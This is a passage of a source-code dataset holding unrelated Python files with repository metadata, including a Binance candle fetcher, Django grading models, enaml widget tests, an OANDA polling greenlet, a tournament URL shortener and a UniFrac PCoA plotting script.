#a = torch.rand(10).cuda()
start = time.time()
count = 0
for k, x in enumerate(dloader):
if k == 0:
count = 0
start = time.time()
shapes = [t.shape for t in x]
print(k, str(shapes))
y = [t.cuda(non_blocking=True) for t in x]
count += 1
end = time.time()
print((end-start)/(count - 1), count)
#start = time.time()
#for x in dloader:
# end = time.time()
# print(x[0].size(), end-start)
# start = end
#
#exit(0)
# preprocess data to speedup traning and predictions
| 29.782468
| 94
| 0.578764
| 7,197
| 0.784585
| 946
| 0.103129
| 206
| 0.022457
| 0
| 0
| 887
| 0.096697
|
bb715b8832fba253f15741c5824e20ae8941000e
| 2,364
|
py
|
Python
|
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
from .utils import to_ms, to_candle
from ..api_candles import ApiCandles
from ...timeframes import Timeframes
import datetime, time
import requests as r
class BinanceApiCandles(ApiCandles):
_url = 'https://api.binance.com/api/v3/klines'
# <Timeframes> : <str - binance str repr>
_binance_intervals = {
Timeframes.M1: '1m',
Timeframes.M3: '3m',
Timeframes.M5: '5m',
Timeframes.M15: '15m',
Timeframes.M30: '30m',
Timeframes.H1: '1h',
Timeframes.H2: '2h',
Timeframes.H4: '4h',
Timeframes.D1: '1d',
Timeframes.W1: '1w'
}
def __init__(self, ticker: str, timeframe_tag: Timeframes):
try:
self._interval = self._binance_intervals[timeframe_tag]
except KeyError:
allowed = list(self._binance_intervals.keys())
            raise ValueError(
                f'Binance API supports the following timeframes: {allowed}')
self._ticker = ticker
self._gen = None
super().__init__(timeframe_tag)
def _candles(self):
# Convert datetime objects to timestamp
since = to_ms(self._start_date.timestamp())
end_time = to_ms(time.time())
MAX_PER_REQUEST = 1000
max_time_step = MAX_PER_REQUEST*self.candle_duration()*1000
params = {
'symbol': self._ticker,
'interval': self._interval,
'startTime': None,
'endTime': end_time,
'limit': MAX_PER_REQUEST
}
for start_time in range(since, end_time, max_time_step):
# this requests 1k candles at a time
params['startTime'] = start_time
res = r.get(self._url, params)
res.raise_for_status()
for obj in res.json():
yield to_candle(obj, self._candle_buffer)
def current_date(self) -> datetime.datetime:
if not self._start_date:
return None
ticks = self.get_ticks()
time_passed = datetime.timedelta(
seconds=ticks*self.candle_duration())
return self._start_date + time_passed
def next(self) -> None:
if not self._gen:
self._gen = iter(self._candles())
next(self._gen)
self._tick_counter.increment()
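# The request that _candles() builds can be exercised standalone; a sketch
# (symbol and limit are examples). Each kline is a list whose first five
# fields are open time (ms), open, high, low, close:
# import requests
# resp = requests.get(
#     'https://api.binance.com/api/v3/klines',
#     {'symbol': 'BTCUSDT', 'interval': '1h', 'limit': 5},
# )
# resp.raise_for_status()
# for open_time_ms, open_, high, low, close, *rest in resp.json():
#     print(open_time_ms, open_, close)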
| 31.945946
| 76
| 0.576565
| 2,200
| 0.930626
| 817
| 0.345601
| 0
| 0
| 0
| 0
| 314
| 0.132826
|
bb723206badf8174dc3f8ba35066d0a2d790ceab
| 2,110
|
py
|
Python
|
server/grading/models.py
|
jauhararifin/ugrade
|
c5bc0ce3920534cf289c739ffe8b83ceed9f52e8
|
[
"MIT"
] | 15
|
2019-02-27T19:28:23.000Z
|
2019-07-20T17:54:46.000Z
|
server/grading/models.py
|
jauhararifin/ugrade
|
c5bc0ce3920534cf289c739ffe8b83ceed9f52e8
|
[
"MIT"
] | 9
|
2020-09-04T18:30:56.000Z
|
2022-03-25T18:41:11.000Z
|
server/grading/models.py
|
jauhararifin/ugrade
|
c5bc0ce3920534cf289c739ffe8b83ceed9f52e8
|
[
"MIT"
] | 2
|
2019-03-29T14:15:47.000Z
|
2019-04-12T06:08:11.000Z
|
import os
import random
from django.db import models
from contests.models import Submission, User, Contest
VERDICT = (
('RTE', 'Run Time Error'),
('MLE', 'Memory Limit Exceeded'),
('TLE', 'Time Limit Exceeded'),
('WA', 'Wrong Answer'),
('CE', 'Compilation Error'),
('IE', 'Internal Error'),
('AC', 'Accepted'),
('PENDING', 'Pending'),
)
def spec_upload_path(instance, filename):
alphanum = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
random_str = ''.join(random.choice(alphanum) for _ in range(64))
return os.path.join("{}-{}-{}".format('gradingspec', instance.id, random_str), filename)
class GradingGroup(models.Model):
submission = models.ForeignKey(
Submission, on_delete=models.CASCADE, related_name='grading_groups')
issued_time = models.DateTimeField(auto_now_add=True)
verdict = models.CharField(
max_length=32, choices=VERDICT, default='PENDING')
finish_time = models.DateTimeField(blank=True, null=True)
    # contains the tcgen, solution, and checker submissions
spec = models.FileField(upload_to=spec_upload_path)
grading_size = models.IntegerField()
def __str__(self):
return "{} - Grading Group #{}".format(self.submission, self.id)
class Grading(models.Model):
# filled when inserted
grading_group = models.ForeignKey(
GradingGroup, on_delete=models.CASCADE, related_name='gradings')
# for optimization
contest = models.ForeignKey(
Contest, on_delete=models.CASCADE, related_name='gradings')
verdict = models.CharField(
max_length=32, choices=VERDICT, default='PENDING')
grader_group = models.IntegerField()
# filled when claimed
claimed_at = models.DateTimeField(blank=True, null=True)
claimed_by = models.ForeignKey(
User, null=True, blank=True, on_delete=models.SET_NULL)
# filled when finished
finish_at = models.DateTimeField(blank=True, null=True)
output = models.FileField(null=True, blank=True)
def __str__(self):
return "{} - Grading #{}".format(self.grading_group, self.id)
| 32.96875
| 92
| 0.694313
| 1,446
| 0.685308
| 0
| 0
| 0
| 0
| 0
| 0
| 479
| 0.227014
|
bb7233933506ce378e6905eadbfa9e01a8d6c38d
| 2,295
|
py
|
Python
|
enaml/tests/widgets/test_spin_box.py
|
mmckerns/enaml
|
ebf417b4dce9132bffa038a588ad90436a59d37e
|
[
"BSD-3-Clause"
] | 11
|
2015-01-04T14:29:23.000Z
|
2019-12-25T05:38:37.000Z
|
enaml/tests/widgets/test_spin_box.py
|
mmckerns/enaml
|
ebf417b4dce9132bffa038a588ad90436a59d37e
|
[
"BSD-3-Clause"
] | 36
|
2015-02-20T00:56:53.000Z
|
2020-12-04T10:02:14.000Z
|
enaml/tests/widgets/test_spin_box.py
|
mmckerns/enaml
|
ebf417b4dce9132bffa038a588ad90436a59d37e
|
[
"BSD-3-Clause"
] | 3
|
2015-11-19T15:11:37.000Z
|
2019-03-11T23:45:02.000Z
|
#------------------------------------------------------------------------------
# Copyright (c) 2012, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
from enaml.validation.api import IntValidator
from .enaml_test_case import EnamlTestCase
class TestSpinBox(EnamlTestCase):
""" Unit tests for the SpinBox widget.
"""
def setUp(self):
enaml_source = """
from enaml.widgets.api import SpinBox, Window
enamldef MainView(Window):
SpinBox:
pass
"""
self.parse_and_create(enaml_source)
self.server_widget = self.find_server_widget(self.view, "SpinBox")
self.client_widget = self.find_client_widget(self.client_view, "QtSpinBox")
def test_set_maximum(self):
""" Test the setting of a SpinBox's maximum attribute
"""
with self.app.process_events():
self.server_widget.maximum = 1000
self.assertEquals(self.client_widget.maximum(), self.server_widget.maximum)
def test_set_minimum(self):
""" Test the setting of a SpinBox's minimum attribute
"""
with self.app.process_events():
self.server_widget.minimum = 10
self.assertEquals(self.client_widget.minimum(), self.server_widget.minimum)
def test_set_single_step(self):
""" Test the setting of a SpinBox's single_step attribute
"""
with self.app.process_events():
self.server_widget.single_step = 25
self.assertEquals(self.client_widget.singleStep(), self.server_widget.single_step)
def test_set_value(self):
""" Test the setting of a SpinBox's value attribute
"""
with self.app.process_events():
self.server_widget.value = 50
self.assertEquals(self.client_widget.value(), self.server_widget.value)
def test_set_wrap(self):
""" Test the setting of a SpinBox's wrap attribute
"""
with self.app.process_events():
self.server_widget.wrapping = True
self.assertEquals(self.client_widget.wrapping(), self.server_widget.wrapping)
### Need to add tests for special_value_text, prefix, suffix and read_only
if __name__ == '__main__':
import unittest
unittest.main()
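The trailing comment above lists tests still to be written; a hedged sketch of one of them, following the file's own pattern (the prefix attribute name and Qt getter are assumptions based on QSpinBox's API):
    def test_set_prefix(self):
        """ Test the setting of a SpinBox's prefix attribute (sketch) """
        with self.app.process_events():
            self.server_widget.prefix = '$'  # assumed enaml attribute name
        self.assertEquals(self.client_widget.prefix(), self.server_widget.prefix)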
| 31.875
| 90
| 0.623094
| 1,911
| 0.83268
| 0
| 0
| 0
| 0
| 0
| 0
| 801
| 0.34902
|
bb723c07c298e3147c128f216ca171ac795e93ac
| 192
|
py
|
Python
|
src/lib/core_funcs.py
|
thekraftyman/discord-bot-starter
|
e6b9174ea346ec060ecda3f2b1d22f1eb6066f95
|
[
"MIT"
] | null | null | null |
src/lib/core_funcs.py
|
thekraftyman/discord-bot-starter
|
e6b9174ea346ec060ecda3f2b1d22f1eb6066f95
|
[
"MIT"
] | null | null | null |
src/lib/core_funcs.py
|
thekraftyman/discord-bot-starter
|
e6b9174ea346ec060ecda3f2b1d22f1eb6066f95
|
[
"MIT"
] | null | null | null |
# core_funcs.py
# By: thekraftyman
'''
container for all of the core funcs that have been distributed among files
'''
from src.lib.async_funcs import *
from src.lib.non_async_funcs import *
| 19.2
| 74
| 0.760417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 115
| 0.598958
|
bb724e768f60fb932f05a9b7ae174961837fa0fc
| 532
|
py
|
Python
|
core/models.py
|
rubberducklive/tcm_api
|
53d2b533e3f9251cce49bd4c1b8e9e65a03eaf04
|
[
"MIT"
] | null | null | null |
core/models.py
|
rubberducklive/tcm_api
|
53d2b533e3f9251cce49bd4c1b8e9e65a03eaf04
|
[
"MIT"
] | null | null | null |
core/models.py
|
rubberducklive/tcm_api
|
53d2b533e3f9251cce49bd4c1b8e9e65a03eaf04
|
[
"MIT"
] | null | null | null |
import uuid
from django.db import models
class TimeStampedModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
class Meta(object):
abstract = True
class PrimaryUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
class Meta(object):
abstract = True
class PrimaryUUIDTimeStampedModel(TimeStampedModel, PrimaryUUIDModel):
class Meta(object):
abstract = True
| 22.166667
| 79
| 0.734962
| 481
| 0.904135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
bb72f9435fdc29920b70ac72d5ae0238e0aa1869
| 1,351
|
py
|
Python
|
oandapyV20-examples-master/src/console/greenlets/accountdetails.py
|
cdibble2011/OANDA
|
68327d6d65dd92952d7a1dc49fe29efca766d900
|
[
"MIT"
] | 127
|
2017-02-28T17:34:14.000Z
|
2022-01-21T13:14:30.000Z
|
oandapyV20-examples-master/src/console/greenlets/accountdetails.py
|
cdibble2011/OANDA
|
68327d6d65dd92952d7a1dc49fe29efca766d900
|
[
"MIT"
] | 36
|
2018-06-07T21:34:13.000Z
|
2022-03-13T21:01:43.000Z
|
oandapyV20-examples-master/src/console/greenlets/accountdetails.py
|
cdibble2011/OANDA
|
68327d6d65dd92952d7a1dc49fe29efca766d900
|
[
"MIT"
] | 76
|
2017-01-02T14:15:07.000Z
|
2022-03-28T03:49:45.000Z
|
# -*- coding: utf-8 -*-
import gevent
from oandapyV20.endpoints.accounts import AccountDetails, AccountChanges
class GAccountDetails(gevent.Greenlet):
"""Greenlet to handle account details/changes.
Initially get the AccountDetails and then keep polling
for account changes.
In case of changes put those on the NAV-Queue
"""
def __init__(self, api, accountID, queue, sleepTime=4):
super(GAccountDetails, self).__init__()
self.api = api
self.accountID = accountID
self.queue = queue
self.sleepTime = sleepTime
def _run(self):
# setup the summary request
r = AccountDetails(accountID=self.accountID)
rv = self.api.request(r)
lastTransactionID = rv.get("lastTransactionID")
lastLastTransactionID = lastTransactionID
r = None
while True:
if not r or lastLastTransactionID != lastTransactionID:
params = {"sinceTransactionID":
int(rv.get("lastTransactionID"))}
r = AccountChanges(accountID=self.accountID, params=params)
lastLastTransactionID = lastTransactionID
rv = self.api.request(r)
lastTransactionID = rv.get('lastTransactionID')
self.queue.put_nowait(rv)
gevent.sleep(self.sleepTime)
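A hedged usage sketch for the greenlet above; the access token and account ID are placeholders:
import gevent
from gevent.queue import Queue
import oandapyV20
api = oandapyV20.API(access_token='...')  # assumed credentials
queue = Queue()
worker = GAccountDetails(api, accountID='101-004-1234567-001', queue=queue)
worker.start()
print(queue.get())  # first AccountDetails/AccountChanges payload
gevent.kill(worker)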
| 32.95122
| 75
| 0.637306
| 1,236
| 0.914878
| 0
| 0
| 0
| 0
| 0
| 0
| 316
| 0.233901
|
bb73bd26c0031f64dbf994ec3a8a3952a7f0e16a
| 802
|
py
|
Python
|
wbsv/main.py
|
yswallow/wbsv-cli
|
30b68d0d1efd56fba99286d53470a39d317d6d9d
|
[
"MIT"
] | null | null | null |
wbsv/main.py
|
yswallow/wbsv-cli
|
30b68d0d1efd56fba99286d53470a39d317d6d9d
|
[
"MIT"
] | null | null | null |
wbsv/main.py
|
yswallow/wbsv-cli
|
30b68d0d1efd56fba99286d53470a39d317d6d9d
|
[
"MIT"
] | null | null | null |
import sys
from . import Archive
from . import Find
from . import ParseArgs
from . import Interact
def iter_urls(opt):
"""Iterate given urls for saving."""
try:
for x in opt["urls"]:
Archive.archive(Find.extract_uri_recursive(x, opt["level"]),
x, opt["retry"])
except KeyboardInterrupt:
print("[!]Interrupted!", file=sys.stderr)
print("[!]Halt.", file=sys.stderr)
exit(1)
def main():
"""Main function."""
opt = ParseArgs.parse_args()
if len(opt["urls"]) == 0:
Interact.interactive(opt)
elif opt["only-target"]:
        for x in opt["urls"]:
            Archive.archive([x], x, opt["retry"])
exit(0)
else:
iter_urls(opt)
exit(0)
if __name__ == "__main__":
main()
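For reference, a hedged sketch of calling iter_urls directly; the opt keys mirror the ones main() reads from ParseArgs, and the values here are illustrative:
iter_urls({'urls': ['https://example.com'], 'level': 1, 'retry': 3})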
| 20.05
| 72
| 0.557357
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 145
| 0.180798
|
bb74b1ea7d5e069ac223adabbb64c46d9e5159e9
| 5,613
|
py
|
Python
|
Sapphire/CallStatement.py
|
Rhodolite/Parser-py
|
7743799794d92aa8560db11f1d6d5f00e5ac1925
|
[
"MIT"
] | null | null | null |
Sapphire/CallStatement.py
|
Rhodolite/Parser-py
|
7743799794d92aa8560db11f1d6d5f00e5ac1925
|
[
"MIT"
] | null | null | null |
Sapphire/CallStatement.py
|
Rhodolite/Parser-py
|
7743799794d92aa8560db11f1d6d5f00e5ac1925
|
[
"MIT"
] | null | null | null |
#
# Copyright (c) 2017-2018 Joy Diamond. All rights reserved.
#
@gem('Sapphire.CallStatement')
def gem():
require_gem('Sapphire.BookcaseExpression')
require_gem('Sapphire.MemberExpression')
require_gem('Sapphire.Method')
require_gem('Sapphire.Tree')
class CallStatementBase(SapphireTrunk):
__slots__ = ((
'frill', # VW_Frill | Commented_VW_Frill
'left', # Expression
'arguments', # Arguments*
))
class_order = CLASS_ORDER__CALL_STATEMENT
is_any_else = false
is_any_except_or_finally = false
is_else_header_or_fragment = false
is_statement_header = false
is_statement = true
def __init__(t, frill, left, arguments):
assert type(left) is not VW_Frill
t.frill = frill
t.left = left
t.arguments = arguments
def __repr__(t):
return arrange('<%s %r %r %r>', t.__class__.__name__, t.frill, t.left, t.arguments)
def add_comment(t, comment):
frill = t.frill
assert frill.comment is 0
return t.conjure_call(
conjure_commented_vw_frill(comment, frill.v, frill.w),
t.left,
t.arguments,
)
def count_newlines(t):
return t.frill.count_newlines() + t.left.count_newlines() + t.arguments.count_newlines()
def find_require_gem(t, e):
if not t.left.is_name('require_gem'):
return
assert t.arguments.is_arguments_1
e.add_require_gem(t.arguments.a)
@property
def indentation(t):
return t.frill.v
def display_token(t):
frill = t.frill
comment = frill.comment
return arrange('<%s +%d%s %s %s %s>',
t.display_name,
frill.v.total,
('' if comment is 0 else '' + comment.display_token()),
t.left .display_token(),
t.arguments.display_token(),
frill.w .display_token())
def dump_token(t, f, newline = true):
frill = t.frill
comment = frill.comment
if comment is 0:
f.partial('<%s +%d ', t.display_name, frill.v.total)
t .left .dump_token(f)
t .arguments.dump_token(f)
r = frill.w .dump_token(f, false)
return f.token_result(r, newline)
with f.indent(arrange('<%s +%d', t.display_name, frill.v.total), '>'):
comment .dump_token(f)
t.left .dump_token(f)
t.arguments.dump_token(f)
frill.w .dump_token(f)
order = order__frill_ab
def scout_variables(t, art):
t.left .scout_variables(art)
t.arguments.scout_variables(art)
def write(t, w):
frill = t.frill
comment = frill.comment
if comment is not 0:
comment.write(w)
w(frill.v.s)
t.left .write(w)
t.arguments.write(w)
w(frill.w.s)
CallStatementBase.a = CallStatementBase.left
CallStatementBase.b = CallStatementBase.arguments
CallStatementBase.k1 = CallStatementBase.frill
CallStatementBase.k2 = CallStatementBase.left
CallStatementBase.k3 = CallStatementBase.arguments
@share
class CallStatement(CallStatementBase):
__slots__ = (())
display_name = 'call-statement'
@share
class MethodCallStatement(CallStatementBase):
__slots__ = (())
display_name = 'method-call-statement'
def produce_conjure_call_statement(name, meta):
cache = create_cache(name, conjure_nub)
return produce_conjure_unique_triple__312(name, meta, cache)
conjure_call_statement = produce_conjure_call_statement('call-statement', CallStatement)
conjure_method_call_statement = produce_conjure_call_statement('method-call-statement', MethodCallStatement)
static_conjure_call_statement = static_method(conjure_call_statement)
static_conjure_method_call_statement = static_method(conjure_method_call_statement)
MemberExpression.call_statement = static_conjure_method_call_statement
PearlToken .call_statement = static_conjure_call_statement
SapphireTrunk .call_statement = static_conjure_call_statement
CallStatement .conjure_call = static_conjure_call_statement
MethodCallStatement.conjure_call = static_conjure_method_call_statement
CallStatement.transform = produce_transform__frill__ab_with_priority(
'call_statement',
PRIORITY_POSTFIX,
PRIORITY_COMPREHENSION,
conjure_call_statement,
)
MethodCallStatement.transform = produce_transform__frill__ab_with_priority(
'method_call_statement',
PRIORITY_POSTFIX,
PRIORITY_COMPREHENSION,
conjure_method_call_statement,
)
| 31.533708
| 112
| 0.549973
| 3,411
| 0.607696
| 0
| 0
| 5,545
| 0.987885
| 0
| 0
| 453
| 0.080706
|
bb75831e0db77f35e095a17d5451a6e61a18c00c
| 546
|
py
|
Python
|
languages/python/sqlalchemy-oso/tests/test_partial.py
|
johnhalbert/oso
|
3185cf3740b74c3c1deaca5b9ec738325de4c8a2
|
[
"Apache-2.0"
] | null | null | null |
languages/python/sqlalchemy-oso/tests/test_partial.py
|
johnhalbert/oso
|
3185cf3740b74c3c1deaca5b9ec738325de4c8a2
|
[
"Apache-2.0"
] | null | null | null |
languages/python/sqlalchemy-oso/tests/test_partial.py
|
johnhalbert/oso
|
3185cf3740b74c3c1deaca5b9ec738325de4c8a2
|
[
"Apache-2.0"
] | null | null | null |
"""Unit tests for partial implementation."""
from polar.expression import Expression
from polar.variable import Variable
from sqlalchemy_oso.partial import dot_op_path
def test_dot_op_path():
single = Expression("Dot", [Variable("_this"), "created_by"])
assert dot_op_path(single) == ["created_by"]
double = Expression("Dot", [single, "username"])
assert dot_op_path(double) == ["created_by", "username"]
triple = Expression("Dot", [double, "first"])
assert dot_op_path(triple) == ["created_by", "username", "first"]
| 32.117647
| 69
| 0.705128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 158
| 0.289377
|
bb75907adc83d289e117c742bd2e7ed7ea682464
| 426
|
py
|
Python
|
lib/version.py
|
Durendal/electrum-rby
|
0dadd13467d44bcc7128f0dec0fa1aeff8d22576
|
[
"MIT"
] | null | null | null |
lib/version.py
|
Durendal/electrum-rby
|
0dadd13467d44bcc7128f0dec0fa1aeff8d22576
|
[
"MIT"
] | 1
|
2021-11-15T17:47:29.000Z
|
2021-11-15T17:47:29.000Z
|
lib/version.py
|
Durendal/electrum-rby
|
0dadd13467d44bcc7128f0dec0fa1aeff8d22576
|
[
"MIT"
] | 1
|
2017-11-13T23:19:46.000Z
|
2017-11-13T23:19:46.000Z
|
ELECTRUM_VERSION = '3.0' # version of the client package
PROTOCOL_VERSION = '0.10' # protocol version requested
# The hash of the mnemonic seed must begin with this
SEED_PREFIX = '01' # Standard wallet
SEED_PREFIX_2FA = '101' # Two-factor authentication
def seed_prefix(seed_type):
if seed_type == 'standard':
return SEED_PREFIX
elif seed_type == '2fa':
return SEED_PREFIX_2FA
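A quick check of the helper above:
assert seed_prefix('standard') == SEED_PREFIX  # '01'
assert seed_prefix('2fa') == SEED_PREFIX_2FA   # '101'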
| 32.769231
| 60
| 0.683099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 190
| 0.446009
|
bb75ca51f4748a57620c013b53d94680ace60cc1
| 1,579
|
py
|
Python
|
src/url.py
|
nahueldebellis/TwitchTournamentGenerator
|
a0a203e08d836ad744850839385324c54314b8a4
|
[
"MIT"
] | null | null | null |
src/url.py
|
nahueldebellis/TwitchTournamentGenerator
|
a0a203e08d836ad744850839385324c54314b8a4
|
[
"MIT"
] | null | null | null |
src/url.py
|
nahueldebellis/TwitchTournamentGenerator
|
a0a203e08d836ad744850839385324c54314b8a4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from pyshorteners import Shortener
"""Url class"""
class Url():
"""This class format participants and add to an url and short the url"""
cant_participants = 0
bracket = 0
def __init__(self):
self.short_url = Shortener()
self.url_final = ['https://scorecounter.com/tournament/?set=', '51001111000000']
self.concat = '&'
self.treintaydos = '5'
self.dieciseis = '4'
self.ocho = '3'
def add(self, participant):
"""add new pasticipant to the bracket"""
Url.bracket = Url.bracket if Url.cant_participants % 2 else Url.bracket+1
Url.cant_participants = Url.cant_participants+1
position = 'home' if Url.cant_participants % 2 else 'visitor'
self.url_final.append(f'{self.concat}{position}1-{Url.bracket}={participant}')
def show(self):
"""concat the url and return the string of shorter url"""
if Url.cant_participants <= 32:
self.url_final[1] = self.treintaydos+self.url_final[1][1:]
if Url.cant_participants <= 16:
self.url_final[1] = self.dieciseis+self.url_final[1][1:]
if Url.cant_participants <= 8:
self.url_final[1] = self.ocho+self.url_final[1][1:]
Url.cant_participants = 0
Url.bracket = 0
self.format_url_spaces()
print(self.url_final)
return self.short_url.isgd.short(self.url_final)
def format_url_spaces(self):
"""replace space with %20 in the url"""
self.url_final = ''.join(self.url_final).replace(' ', '%20')
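A minimal usage sketch for the class above; pyshorteners' is.gd backend needs network access:
url = Url()
for name in ['Alice', 'Bob', 'Carol', 'Dave']:
    url.add(name)
print(url.show())  # show() prints the assembled URL and returns the shortened is.gd link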
| 41.552632
| 88
| 0.627612
| 1,504
| 0.952502
| 0
| 0
| 0
| 0
| 0
| 0
| 395
| 0.250158
|
bb76a8caabf2f194e804291ce67ba419fda452c3
| 5,302
|
py
|
Python
|
UniPCoA.py
|
AdeBC/UniRPyCoA
|
f5b54297daf07856d9a88ebc8e6277e7be9b7ecc
|
[
"MIT"
] | null | null | null |
UniPCoA.py
|
AdeBC/UniRPyCoA
|
f5b54297daf07856d9a88ebc8e6277e7be9b7ecc
|
[
"MIT"
] | null | null | null |
UniPCoA.py
|
AdeBC/UniRPyCoA
|
f5b54297daf07856d9a88ebc8e6277e7be9b7ecc
|
[
"MIT"
] | null | null | null |
import os
import pandas as pd
from plotnine import *
import plotnine
from matplotlib import pyplot as plt
import matplotlib
from scipy.spatial.distance import pdist, squareform
from skbio.stats.ordination import pcoa
from skbio.diversity import beta_diversity
from skbio.io import read
from skbio.tree import TreeNode
import argparse
def loadTree(tree):
with open(tree, 'r') as f:
tree = read(f, format="newick", into=TreeNode)
return tree
if __name__ == '__main__':
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--abundance', type=str, default='species_abundance.csv', help='The input abundance data, columns represent samples and rows represent taxa.')
parser.add_argument('-m', '--metadata', type=str, default='metadata.csv', help='The input metadata, use column "Env" to specify the group of the input samples.')
    parser.add_argument('-o', '--output', type=str, default='Plots.Unifrac', help='The folder to save output table and plots.')
parser.add_argument('-t', '--tree', type=str, default='LTPs132_SSU_tree.newick', help='The input phylogenetic tree, in Newick format.')
parser.add_argument('--metric', type=str, default='weighted_unifrac', help='The metric for beta_diversity calculation.')
args = parser.parse_args()
print('Loading data...')
X = pd.read_csv(args.abundance, index_col=0).T
Y = pd.read_csv(args.metadata).set_index('SampleID')
use_phylogeny = args.metric in ['weighted_unifrac', 'unweighted_unifrac']
if use_phylogeny:
tree = loadTree(tree=args.tree)
print('Processing the phylogenetic tree...')
for n in tree.postorder():
            if n.name is not None and '_ ' in n.name:
n.name = n.name.split('_ ')[1]
names = [n.name for n in tree.postorder()]
print('Processing the abundance data...')
ids = X.index.tolist()
otu_ids = X.columns.tolist()
X = X.reset_index().melt(id_vars=['index'], value_vars=X.columns, var_name='taxonomy', value_name='abundance')
taxa = pd.DataFrame(X.taxonomy.apply(lambda x: dict(map(lambda y: y.split('__'), filter(lambda x: not x.endswith('__'), x.split(';'))))).tolist())
X = pd.concat([X.drop(columns=['taxonomy']), taxa], axis=1)
X = X.melt(id_vars=['index','abundance'], value_vars=taxa.columns, var_name='rank', value_name='taxonomy')
X = X.groupby(by=['index', 'taxonomy'], as_index=False).sum().pivot_table(columns='taxonomy', index='index', values='abundance')
if use_phylogeny:
X = X.loc[:, X.columns.to_series().isin(names)]
ids = X.index.tolist()
otu_ids = X.columns.tolist()
try:
print('Trying calculating {} beta_diversity using scikit-bio & scikit-learn package...'.format(args.metric))
print('This could be time-consuming.')
if use_phylogeny:
mat = beta_diversity(args.metric, X, ids, tree=tree, otu_ids=otu_ids, validate=False).data
else:
mat = beta_diversity(args.metric, X, ids, otu_ids=otu_ids, validate=False).data
except ValueError:
print('Failed, the metric you selected is not supported by neither scikit-bio nor scikit-learn.')
print('Trying using SciPy...')
mat = squareform(pdist(X, metric=args.metric))
print('Succeeded!')
pcs = pd.DataFrame(pcoa(mat, number_of_dimensions=2).samples.values.tolist(), index=X.index, columns=['PC1', 'PC2'])
pcs = pd.concat([pcs, Y], axis=1)
print('Visualizing the data using plotnine package...')
p = (ggplot(pcs, aes(x='PC1', y='PC2', color='Env'))
+ geom_point(size=0.2)
+ scale_color_manual(['#E64B35FF','#4DBBD5FF','#00A087FF','#3C5488FF','#F39B7FFF','#8491B4FF','#91D1C2FF'])
+ theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())
+ theme(axis_line = element_line(color="gray", size = 1))
+ stat_ellipse()
+ xlab('PC1')
+ ylab('PC2')
)
box_1 = (ggplot(pcs, aes(x='Env', y='PC1', color='Env'))
+ geom_boxplot(width=0.3, show_legend=False)
+ scale_color_manual(['#E64B35FF','#4DBBD5FF','#00A087FF','#3C5488FF','#F39B7FFF','#8491B4FF','#91D1C2FF'])
+ theme(figure_size=[4.8, 1])
+ theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())
+ theme(axis_line = element_line(color="gray", size = 1))
+ xlab('Env')
+ ylab('PC1')
+ coord_flip()
)
box_2 = (ggplot(pcs, aes(x='Env', y='PC2', color='Env'))
+ geom_boxplot(width=0.3, show_legend=False)
+ scale_color_manual(['#E64B35FF','#4DBBD5FF','#00A087FF','#3C5488FF','#F39B7FFF','#8491B4FF','#91D1C2FF'])
+ theme(figure_size=[4.8, 1])
+ theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())
+ theme(axis_line = element_line(color="gray", size = 1))
+ xlab('Env')
+ ylab('PC2')
+ coord_flip()
)
if not os.path.isdir(args.output):
os.mkdir(args.output)
p.save(os.path.join(args.output, 'PCoA.pdf'), width=4.8, height=4.8)
box_1.save(os.path.join(args.output, 'PC1_boxplot.pdf'), width=4.8, height=1)
box_2.save(os.path.join(args.output, 'PC2_boxplot.pdf'), width=4.8, height=1)
pcs.to_csv(os.path.join(args.output, 'Principle_coordinations.csv'))
print('Plots are saved in {}. Import them into Illustrator for further improvements.'.format(args.output))
| 49.092593
| 169
| 0.704828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,550
| 0.292343
|
bb77128dc910f27388f4e518fef5f850a41210e0
| 357
|
py
|
Python
|
web/impact/impact/graphql/types/location_type.py
|
masschallenge/impact-api
|
81075ced8fcc95de9390dd83c15e523e67fc48c0
|
[
"MIT"
] | 5
|
2017-10-19T15:11:52.000Z
|
2020-03-08T07:16:21.000Z
|
web/impact/impact/graphql/types/location_type.py
|
masschallenge/impact-api
|
81075ced8fcc95de9390dd83c15e523e67fc48c0
|
[
"MIT"
] | 182
|
2017-06-21T19:32:13.000Z
|
2021-03-22T13:38:16.000Z
|
web/impact/impact/graphql/types/location_type.py
|
masschallenge/impact-api
|
81075ced8fcc95de9390dd83c15e523e67fc48c0
|
[
"MIT"
] | 1
|
2018-06-23T11:53:18.000Z
|
2018-06-23T11:53:18.000Z
|
from graphene_django import DjangoObjectType
from accelerator.models import Location
class LocationType(DjangoObjectType):
class Meta:
model = Location
only_fields = (
'street_address',
'timezone',
'country',
'state',
'name',
'city',
'id'
)
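A hedged sketch of wiring this type into a graphene schema; the Query class below is illustrative, not part of the repo:
import graphene
class Query(graphene.ObjectType):
    locations = graphene.List(LocationType)
    def resolve_locations(self, info):
        return Location.objects.all()
schema = graphene.Schema(query=Query)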
| 18.789474
| 44
| 0.521008
| 267
| 0.747899
| 0
| 0
| 0
| 0
| 0
| 0
| 58
| 0.162465
|
